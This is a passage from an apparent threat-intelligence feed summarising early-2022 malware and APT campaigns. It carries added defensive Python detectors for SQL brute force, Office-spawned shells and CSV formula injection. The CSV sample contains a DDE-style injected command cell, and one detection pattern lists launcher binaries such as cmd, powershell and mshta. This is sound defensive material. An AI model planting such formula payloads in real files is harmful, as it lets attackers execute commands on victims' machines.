- Authorities from the US and UK have released a detailed advisory about the recent cyber espionage campaign of MuddyWater, which is allegedly state sponsored by Iran and works in the interests of the MOIS. In this campaign they have mainly targeted government and private organizations from industries including telecom, defense and oil & gas, located in Asia, Africa, Europe and North America. This time they have come up with a variety of malware, including PowGoop, Small Sieve, Mori and POWERSTATS.
—
- Intel Source:
- Intezer
- Intel Name:
- TeamTNT targeting Linux servers
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Intezer have published the TTPs of the TeamTNT threat actor. Over the past year TeamTNT has been very active and is one of the predominant cryptojacking threat actors; it is currently targeting Linux servers.
Source:
https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/
—
- Intel Source:
- NCSC-UK
- Intel Name:
- Cyclops Blink malware by Sandworm
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- A joint advisory has been published by the NCSC (UK) and CISA, FBI and NSA (USA) that identifies a new malware used by the actor Sandworm. Sandworm, also known as Voodoo Bear, has previously been attributed to Russia's GRU. The malware, dubbed Cyclops Blink, appears to be a replacement for the VPNFilter malware exposed in 2018, and its deployment could allow Sandworm to remotely access networks. The advisory also includes information on the associated TTPs used by Sandworm.
Source:
https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf
—
- Intel Source:
- ESET
- Intel Name:
- HermeticWiper Malware
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- ESET Research discovered a new data wiper malware used against Ukraine. ESET detected that it was installed on hundreds of machines in the country. This follows the DDoS attacks against several Ukrainian websites.
—
- Intel Source:
- CyCraft
- Intel Name:
- Operation Cache Panda
- Date of Scan:
- 2022-02-23
- Impact:
- LOW
- Summary:
- Researchers from CyCraft came across a campaign that has been targeting Taiwan's financial trading sector through a supply chain attack; the campaign has been attributed to the allegedly state-sponsored threat actor APT10.
Source:
https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934
—
- Intel Source:
- ASEC
- Intel Name:
- Cobalt Strike targets MS-SQL servers
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC discovered a campaign in which unpatched Microsoft SQL Database servers were targeted for the distribution of Cobalt Strike. The attacker usually scans port 1433 to check whether MS-SQL servers are open to the public; if one is found open, they launch brute-force or dictionary attacks against the admin account.
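The brute-force pattern described here (and in the Vollgar CoinMiner entry earlier on this page) is visible in SQL Server's own login auditing once failed logins are recorded. The detector below is an added example, not ASEC's code: it counts event 18456 login failures per source address inside a sliding window and notes when a success (event 18454) follows the burst, which is the signal that the guessing worked. The log lines are constructed, and the single-line message layout, the five-in-five-minutes threshold and the field names are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Single-line form of SQL Server events 18456 (login failed) and 18454
# (login succeeded) as they appear in the Windows Application log (assumed layout).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']*)'.*?"
    r"\[CLIENT: (?P<client>[^\]\s]+)\]"
)

# Constructed sample: a burst of failures from one source (two usernames tried)
# followed by a success, plus one ordinary typo from an internal host.
SAMPLE_LOG = """\
2022-02-21 10:15:01 Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2022-02-21 10:15:02 Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2022-02-21 10:15:02 Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2022-02-21 10:15:03 Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2022-02-21 10:15:04 Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2022-02-21 10:15:05 Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2022-02-21 10:15:40 Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]
2022-02-21 10:20:00 Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.12]
2022-02-21 10:20:09 Login succeeded for user 'appuser'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.12]
"""


def parse(lines):
    """Yield (timestamp, outcome, user, client) for each line that matches."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                   m["outcome"], m["user"], m["client"])


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Flag clients with >= threshold failed logins inside a sliding window.

    Returns {client: {"peak_in_window": n, "users": set, "success_after_burst": bool}}.
    A success from a flagged client means the host should be treated as compromised.
    """
    fails = defaultdict(deque)   # client -> timestamps of recent failures
    users = defaultdict(set)     # client -> usernames tried
    findings = {}
    for ts, outcome, user, client in parse(lines):
        if outcome == "failed":
            users[client].add(user)
            q = fails[client]
            q.append(ts)
            while ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                f = findings.setdefault(
                    client, {"peak_in_window": 0, "users": set(), "success_after_burst": False})
                f["peak_in_window"] = max(f["peak_in_window"], len(q))
                f["users"] = set(users[client])
        elif client in findings:
            findings[client]["success_after_burst"] = True
    return findings


if __name__ == "__main__":
    for client, f in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{client}: {f['peak_in_window']} failures in window, users={sorted(f['users'])}, "
              f"success_after_burst={f['success_after_burst']}")
```

The success signal only exists if the instance audits both failed and successful logins (Server Properties, Security, Login auditing); the default records failures only. Exposure on 1433 is the root cause, so pair the alert with an inventory check that no MS-SQL instance is reachable from the internet.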
—
- Intel Source:
- DFIR Report
- Intel Name:
- Qbot utilized to exploit ZeroLogon Vulnerability
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers at The DFIR Report have documented threat actors using Qbot together with the ZeroLogon vulnerability. The threat actor gained initial access through the execution of a malicious DLL.
Source:
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
—
- Intel Source:
- Cado security
- Intel Name:
- Katana Botnet exploited Ukrainian websites
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- A team from Cado Security has identified the 'Katana botnet' (a Mirai variant) as the source behind the series of DDoS attacks against Ukrainian websites between 15-16 February. The impacted sites included bank, government and military websites. Moreover, Ukrainian CERT, 360Netlab and BadPackets have attributed the source of these attacks to the Mirai botnet.
Source:
https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/
—
- Intel Source:
- ASEC
- Intel Name:
- CryptBot Infostealer
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- A new version of the CryptBot infostealer was found by ASEC researchers, distributed via multiple websites that offer free downloads of cracks for games and professional software. In the current version of CryptBot there is only one info-stealing C2.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Predatory Sparrow targets Iran’s BroadCaster
- Date of Scan:
- 2022-02-22
- Impact:
- LOW
- Summary:
- A wave of cyberattacks has flooded Iran in 2021 and early 2022. The CPR team has done a technical analysis on one of the attacks, against the Iranian national media corporation Islamic Republic of Iran Broadcasting (IRIB), which occurred in late January 2022.
Source:
https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
—
- Intel Source:
- Blackberry
- Intel Name:
- Arkei Infostealer utilizing SmokeLoader
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- The latest analysis of the Arkei Infostealer shows that the cyber-thieves are increasingly targeting people using multifactor authentication as well as crypto-wallets. Arkei Infostealer is often sold and distributed as Malware-as-a-Service and has been spotted utilizing SmokeLoader as a method of deployment. Both Arkei and SmokeLoader have been identified using the same IOCs and known-malicious URLs to conduct their malicious operations.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Remcos RAT
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- An ISC SANS researcher has shared an analysis of a sample received via email. The file arrived as an attachment to a mail that pretended to be related to a purchase order. The researcher later attributed the file to the Remcos RAT.
Source:
https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/
—
- Intel Source:
- ASEC
- Intel Name:
- PseudoManuscrypt Malware
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- Multiple Windows machines in South Korea have been attacked by the PseudoManuscrypt malware. This malware is said to use the same tactics as CryptBot. The malware's targets have been mostly government and industrial organizations.
—
- Intel Source:
- SentinelOne
- Intel Name:
- TunnelVision exploiting Log4j
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have observed activity of the TunnelVision attackers, which focuses on exploitation of the VMware Horizon Log4j vulnerabilities. The attackers actively exploit the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement. Researchers have been tracking the activity of this Iranian threat actor operating in the Middle East and the US.
—
- Intel Source:
- Fortinet
- Intel Name:
- Moses Staff targets Israeli Organization
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Moses Staff threat actor has recently launched a new espionage campaign against Israeli organizations. This time they have been leveraging the ProxyShell vulnerability in Microsoft Exchange servers as an initial infection vector to deploy two web shells followed by exfiltrating Outlook Data Files (.PST) from the compromised server.
Source:
https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard
—
- Intel Source:
- ZeroFox
- Intel Name:
- Kraken- A new botnet
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Researchers from ZeroFox have found a new Golang-based botnet dubbed Kraken, which is currently under development and has backdoor capabilities to siphon sensitive information from compromised Windows hosts. Its targets are crypto wallets, including Armory, Atomic Wallet, Bytecoin, Electrum, Ethereum, Exodus, Guarda, Jaxx Liberty and Zcash.
Source:
https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/#iocs
—
- Intel Source:
- Palo Alto
- Intel Name:
- Gamaredon targets Ukraine
- Date of Scan:
- 2022-02-18
- Impact:
- HIGH
- Summary:
- The Russia-linked Gamaredon hacking group, aka Primitive Bear, has been actively targeting a Western government entity in Ukraine. The threat vector was a phishing attack that leveraged a job search and employment platform within the country as a conduit to upload their malware downloader in the form of a resume for an active job listing related to the targeted entity.
—
- Intel Source:
- Cofense
- Intel Name:
- Power BI Phishing Campaign
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- The Cofense Phishing Defense Center has analysed a new phishing campaign that harvests Microsoft credentials by impersonating Power BI emails. Because Power BI is popular, widely used and backed by vendor trust, it has become a prime target for threat actors to spoof and abuse in phishing attacks.
Source:
https://cofense.com/blog/phishers-spoof-power-bi-to-visualize-your-credential-data
—
- Intel Source:
- Inquest
- Intel Name:
- GlowSpark Campaign
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- Inquest Labs researchers analysed a malicious document from the GlowSpark campaign, which is a possible attack vector in the WhisperGate attack. Some samples of this campaign are quite stealthy while successfully infecting the target, which allows the threat actor to gain a strong foothold in the victim's network without leaving a large footprint.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Emotet new Infection Method
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto Unit 42 have found that, yet again, the infamous Emotet malware has switched tactics: an email campaign propagates through socially engineered emails carrying malicious Excel files that include an obfuscated Excel 4.0 macro. When the macro is activated, it downloads and executes an HTML application, which in turn downloads two stages of PowerShell to retrieve and execute the final Emotet payload.
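However the Excel 4.0 macro is obfuscated, the chain just described leaves a process lineage (Office application, then mshta.exe, then powershell.exe) that endpoint telemetry records. The following is an added example, not Unit 42's code: it rebuilds parent/child lineage from constructed Sysmon-style process-creation records and flags every shell that descends from an Office application, reporting the intermediate LOLBin so the analyst sees the HTA stage. The record field names and the sample events are assumptions.

```python
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Constructed process-creation records in the shape of Sysmon Event ID 1
# (pid, parent pid, image path). Not real telemetry; pids are arbitrary.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # benign: an admin opened a shell from the desktop, no Office ancestor
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Return image names from the process up to the root, child first."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def flag_office_spawned_shells(events):
    """Return one hit per shell process that descends from an Office application.

    The chain is rendered child-first up to the Office ancestor, and via_lolbin
    records whether a script host such as mshta.exe sits in between.
    """
    hits = []
    for e in events:
        if image_name(e["image"]) not in SHELLS:
            continue
        chain = ancestry(events, e["pid"])
        office_idx = next((i for i, n in enumerate(chain) if n in OFFICE_APPS), None)
        if office_idx is None:
            continue
        hits.append({
            "pid": e["pid"],
            "chain": " <- ".join(chain[:office_idx + 1]),
            "via_lolbin": any(n in LOLBINS for n in chain[1:office_idx]),
        })
    return hits


if __name__ == "__main__":
    for h in flag_office_spawned_shells(SAMPLE_EVENTS):
        print(f"pid {h['pid']}: {h['chain']} (via LOLBin: {h['via_lolbin']})")
```

On real Sysmon data, key the lookup on ProcessGuid rather than pid, since pids are reused after a process exits; the pid lookup here is only for the constructed sample. The second-stage PowerShell (pid 500) is flagged as well because the walk continues past the first shell, which is what you want when the first stage only fetches the next one.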
Source:
https://unit42.paloaltonetworks.com/new-emotet-infection-method/
—
- Intel Source:
- SentinelOne
- Intel Name:
- ModifiedElephant APT
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers attributed the intrusions to a group tracked as 'ModifiedElephant'. The threat actor has been operational since at least 2012, and its activity aligns sharply with Indian state interests. The threat actor uses spear-phishing with malicious documents to deliver malware such as NetWire, DarkComet and keyloggers.
Source:
https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/
—
- Intel Source:
- STR
- Intel Name:
- BlackByte TTP_Seeder Queries_16/02/2022
- Date of Scan:
- 2022-02-17
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Picus Security
- Intel Name:
- LockBit 2.0 Ransomware TTPs
- Date of Scan:
- 2022-02-16
- Impact:
- HIGH
- Summary:
- On 4 February 2022 the FBI issued a Flash report on LockBit 2.0 ransomware with a few IoCs. The Picus Security team has also shared TTPs used by the LockBit 2.0 ransomware operators in emerging ransomware campaigns.
—
- Intel Source:
- Minerva Labs
- Intel Name:
- MyloBot Malware
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- A new version of the MyloBot malware has been observed deploying malicious payloads that are used to send sextortion emails demanding a large sum in digital currency from victims. MyloBot also leverages a technique called process hollowing, in which the attack code is injected into a suspended and hollowed process in order to circumvent process-based defenses.
Source:
https://blog.minerva-labs.com/mylobot-2022-so-many-evasive-techniques-just-to-send-extortion-emails
—
- Intel Source:
- Checkpoint
- Intel Name:
- Trickbot Attacks Global Giants customers
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Check Point analyzed a new evasive technique of TrickBot and found that this time it has been targeting the customers of more than 60 firms worldwide. The TrickBot operators have been using anti-analysis techniques so that researchers cannot send automated requests to the command-and-control servers to get fresh web-injects.
—
- Intel Source:
- Fortinet
- Intel Name:
- BitRAT malware
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Threat actors are leveraging NFT (non-fungible token) information to lure users into downloading the BitRAT malware. The campaign makes use of malicious Excel files named 'NFT_Items' to attract targets. These files are hosted on the Discord app and appear to contain names of NFTs, forecasts for potential investment returns and selling quantities.
Source:
https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat
—
- Intel Source:
- SecureWorks
- Intel Name:
- ShadowPad RAT linked to Chinese government
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Secureworks were able to link recent activity of the ShadowPad malware to multiple threat actors from China whose activity can be linked to a Chinese ministry and the PLA. It is the same malware that was behind the attacks on NetSarang, CCleaner and ASUS.
Source:
https://www.secureworks.com/research/shadowpad-malware-analysis
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA2541 APT targets Aviation
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers have identified the threat actor TA2541 targeting the aviation and aerospace industries. The threat actor commonly uses RATs through which they can control compromised machines. Targets are said to number in the hundreds of organizations across North America, Europe and the Middle East.
Source:
https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight
—
- Intel Source:
- FBI FLASH
- Intel Name:
- BlackByte Ransomware
- Date of Scan:
- 2022-02-15
- Impact:
- MEDIUM
- Summary:
- BlackByte ransomware has compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture). It recently made the news when the ransomware attacked the San Francisco 49ers ahead of the Super Bowl.
—
- Intel Source:
- Sansec
- Intel Name:
- Magecart attacking Magento sites
- Date of Scan:
- 2022-02-15
- Impact:
- MEDIUM
- Summary:
- According to Sansec, more than 350 ecommerce stores were infected with malware in a single day. All stores were victims of a payment skimmer loaded from a single domain. The domain is currently offline; the goal of the threat actors was to steal the credit card information of customers on the targeted online stores.
Source:
https://sansec.io/research/naturalfreshmall-mass-hack
—
- Intel Source:
- ESET
- Intel Name:
- OilRig’s New Espionage Campaign-Out To Sea
- Date of Scan:
- 2022-02-14
- Impact:
- MEDIUM
- Summary:
- Researchers from ESET recently discovered a new campaign dubbed 'Out to Sea'. The campaign was attributed to APT34 (OilRig), which has also been linked to the Lyceum group. Their malware toolset has been further developed, and they have come up with a backdoor named Marlin.
Source:
https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf
—
- Intel Source:
- HP
- Intel Name:
- RedLine Stealer disguised as Windows 11 installer
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Threat actors started luring Windows 10 users soon after the announcement of the Windows 11 upgrade. They are using a fake Microsoft website to trick users into downloading and running a fake installer that executes the RedLine stealer malware.
Source:
https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/
—
- Intel Source:
- Cado security
- Intel Name:
- CoinStomp Malware
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Cado Security researchers have discovered a new malware campaign targeting Asian cloud service providers (CSPs). Researchers dubbed the malware CoinStomp; this family of malware exploits cloud compute instances for the purpose of mining cryptocurrency.
Source:
https://www.cadosecurity.com/coinstomp-malware-family-targets-asian-cloud-service-providers/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Emotet dropping Cobalt Strike
- Date of Scan:
- 2022-02-11
- Impact:
- HIGH
- Summary:
- Researchers at SANS have dissected a Cobalt Strike sample dropped by Emotet and shared their analysis.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Transparent Tribe Group/APT36
- Date of Scan:
- 2022-02-11
- Impact:
- HIGH
- Summary:
- Researchers from Talos recently analysed Crimson RAT and Oblique RAT samples and were able to attribute the attack to the Transparent Tribe threat group, also known as APT36. The threat actor is known to target India. Their initial infection vector is usually an email purporting to come from official sources and containing a lure, which can be a Word document or, more often, an Excel spreadsheet.
Source:
http://blog.talosintelligence.com/2022/02/whats-with-shared-vba-code.html
—
- Intel Source:
- Cybereason
- Intel Name:
- Lorenz Ransomware
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Lorenz ransomware was first seen in February 2021 and is believed to be a rebranding of the '.s40' ransomware. Lorenz targets organisations worldwide with customised attacks, mostly hitting victims in English-speaking countries.
Source:
https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware
—
- Intel Source:
- Sophos
- Intel Name:
- SolarMarker Campaign
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- SophosLabs has monitored a series of new efforts to distribute SolarMarker, an information stealer and backdoor. First detected in 2020, the .NET malware, usually delivered by a PowerShell installer, has information harvesting and backdoor capabilities.
—
- Intel Source:
- Intel471
- Intel Name:
- PrivateLoader
- Date of Scan:
- 2022-02-10
- Impact:
- MEDIUM
- Summary:
- An analysis of a pay-per-install loader by Intel 471 researchers has highlighted its place in the deployment of popular malware strains including SmokeLoader, Vidar and RedLine. PrivateLoader is mostly distributed through cracked software websites.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Molerat Palestinian-Aligned Espionage campaign
- Date of Scan:
- 2022-02-10
- Impact:
- HIGH
- Summary:
- A new campaign discovered by Proofpoint researchers details the operations of the Molerats threat group (TA402), which is allegedly aligned with Palestinian interests. TA402 is abusing Dropbox services not only for delivery of NimbleMamba but also for malware command and control (C2).
—
- Intel Source:
- Microsoft
- Intel Name:
- Mac Trojan:Update Agent
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- The Mac trojan UpdateAgent has evolved, adding multiple capabilities to its arsenal, such as bypassing Gatekeeper. It lures its victims by impersonating legitimate software and can leverage Mac device functionality to its benefit.
—
- Intel Source:
- DFIR Report
- Intel Name:
- QakBot Phishing campaign
- Date of Scan:
- 2022-02-09
- Impact:
- HIGH
- Summary:
- Qakbot activity since October 2021 has been demystified by DFIR Report researchers. A malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document, the initial Qbot DLL loader was downloaded and saved to disk.
Source:
https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Arid Viper APT
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- Cisco Talos has observed a new wave of the Delphi malware called Micropsia, developed and operated by the Arid Viper APT group since 2017. This campaign targets Palestinian entities and activists using politically themed lures. The group is believed to be based out of Gaza and is known to target organizations all over the world.
Source:
http://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html
—
- Intel Source:
- CyberGeeks
- Intel Name:
- Lazarus APT targeting job seekers
- Date of Scan:
- 2022-02-09
- Impact:
- LOW
- Summary:
- Lazarus APT is yet again targeting job seekers, using job opportunity documents for companies such as Lockheed Martin, BAE Systems and Boeing. In this blog the researcher analysed a document called Boeing BDS MSE.docx, which focuses on people looking for jobs at Boeing. The malware extracts the hostname, username, network information, a list of processes and other information that is exfiltrated to one of four C2 servers.
Source:
https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/
—
- Intel Source:
- Volexity
- Intel Name:
- Operation EmailThief
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- An alleged Chinese threat actor tracked as TEMP_Heretic is actively attempting to exploit a zero-day XSS vulnerability in the Zimbra open-source email platform. The campaign has been named EmailThief. Successful exploitation of the cross-site scripting (XSS) vulnerability could allow threat actors to execute arbitrary JavaScript code in the victim's browser.
—
- Intel Source:
- Mandiant
- Intel Name:
- SEO Poisoning distributes BATLOADER malware
- Date of Scan:
- 2022-02-09
- Impact:
- HIGH
- Summary:
- Mandiant researchers uncovered a malicious campaign using SEO poisoning to trick potential victims into downloading the BATLOADER malware. The attackers created malicious sites, packed them with keywords of popular software products and used search engine optimization poisoning to make them show up higher in search results.
Source:
https://www.mandiant.com/resources/seo-poisoning-batloader-atera
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese APT Antlion targets financial institutions
- Date of Scan:
- 2022-02-09
- Impact:
- LOW
- Summary:
- Antlion (a Chinese state-backed APT) has been targeting financial institutions in Taiwan in a persistent campaign over the course of at least 18 months. The attackers deployed a custom backdoor that Symantec calls xPack on compromised systems, which gave them extensive access to victim machines.
—
- Intel Source:
- STR
- Intel Name:
- QBot_Seeder Queries_07/02/2022
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- FBI FLASH
- Intel Name:
- LockBit 2.0 Ransomware
- Date of Scan:
- 2022-02-08
- Impact:
- HIGH
- Summary:
- LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics, techniques and procedures (TTPs). LockBit 2.0 ransomware compromises victim networks through a variety of techniques, including but not limited to purchased access, unpatched vulnerabilities, insider access and zero-day exploits.
—
- Intel Source:
- STR
- Intel Name:
- Lockbit 2.0 TTP_Seeder Queries_07/02/2022
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- AhnLab
- Intel Name:
- Gold Dragon Malware
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- A new wave of activity from the Kimsuky hacking group has been spotted by the ASEC analysis team. The group was using xRAT (an open-source RAT), dropped alongside their custom backdoor dubbed Gold Dragon. The campaign started on January 24, 2022, targeting South Korean entities and is still ongoing.
—
- Intel Source:
- STR
- Intel Name:
- Blackcat Ransomware_Seeder Queries_04/02/2022
- Date of Scan:
- 2022-02-07
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Bleeping Computer
- Intel Name:
- BazarBackdoor malware campaign
- Date of Scan:
- 2022-02-07
- Impact:
- MEDIUM
- Summary:
- A new phishing campaign is using specially crafted CSV text files to infect users' devices with the BazarBackdoor malware. The phishing emails pretend to be 'Payment Remittance Advice' with links to remote sites that download a CSV file with names similar to 'document-21966.csv'.
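The entry says only that the CSV files are 'specially crafted'. A plain-text CSV can only do harm when a spreadsheet application evaluates a cell as a formula, so this added example (not Bleeping Computer's code) assumes that mechanism and scans a CSV for cells that Excel would treat as formulas, rating DDE-style pipe syntax and launcher names as high severity; it also shows the usual neutralization for files you generate yourself. The sample CSV, the trigger characters and the pattern list are constructed assumptions.

```python
import csv
import io
import re

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula
# instead of displaying it as text.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Inside a formula cell, these indicate something other than arithmetic:
# DDE pipe syntax (=cmd|'...'!A0) and functions that launch or fetch things.
DANGEROUS_RE = re.compile(
    r"\|\s*'|\b(cmd|powershell|mshta|wmic|msiexec|regsvr32|rundll32)\b"
    r"|HYPERLINK|WEBSERVICE|IMPORTXML|IMPORTDATA", re.IGNORECASE)

# Constructed sample in the shape of a remittance-advice CSV. Row 4 carries a
# DDE-style cell; it is inert text here and is never evaluated by this script.
SAMPLE_CSV = """\
invoice_id,amount,note
21966,-150.00,Payment remittance advice
21967,=SUM(B2:B2),legit-looking formula
21968,"=cmd|' /C calc'!A0",DDE-style cell
21969,@SUM(1;2),alternate trigger character
"""


def looks_numeric(value):
    """'-150.00' and '+3' are numbers, not formulas; don't flag them."""
    try:
        float(value.replace(",", ""))
        return True
    except ValueError:
        return False


def scan_csv(text):
    """Return one finding per cell that a spreadsheet would treat as a formula."""
    findings = []
    for row_no, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for col_no, cell in enumerate(row, start=1):
            stripped = cell.lstrip(" ")
            if not stripped.startswith(FORMULA_TRIGGERS) or looks_numeric(stripped):
                continue
            findings.append({
                "row": row_no, "col": col_no, "cell": cell,
                "severity": "high" if DANGEROUS_RE.search(stripped) else "low",
            })
    return findings


def neutralize(cell):
    """Prefix a formula-looking cell with a single quote so it stays text."""
    stripped = cell.lstrip(" ")
    if stripped.startswith(FORMULA_TRIGGERS) and not looks_numeric(stripped):
        return "'" + cell
    return cell


if __name__ == "__main__":
    for f in scan_csv(SAMPLE_CSV):
        print(f"row {f['row']} col {f['col']} [{f['severity']}]: {f['cell']!r}")
```

The severity is a heuristic: a low-rated `=SUM()` in a file from an external sender is still a reason to quarantine the attachment, since no legitimate remittance advice needs live formulas. The control that removes the class of problem is disabling Dynamic Data Exchange Server Launch under External Content in the Office Trust Center, alongside blocking or detonating CSV attachments at the mail gateway.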
—
- Intel Source:
- Cybereason
- Intel Name:
- StrifeWater RAT added to Iranian APT Moses Staff arsenal
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- Researchers discovered a previously unidentified Remote Access Trojan (RAT) in the Moses Staff arsenal dubbed StrifeWater. The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group’s tracks. The RAT possesses other capabilities such as command execution and screen capturing as well as the ability to download additional extensions.
—
- Intel Source:
- @3xport
- Intel Name:
- Mars Stealer- New variant of Oski Stealer
- Date of Scan:
- 2022-02-04
- Impact:
- LOW
- Summary:
- A new variant of Oski Stealer has been identified in the wild, named Mars Stealer. It has the capability to steal information from all popular web browsers, two-factor authentication plugins, and multiple cryptocurrency extensions and wallets.
—
- Intel Source:
- PWC
- Intel Name:
- White Tur Threat Group
- Date of Scan:
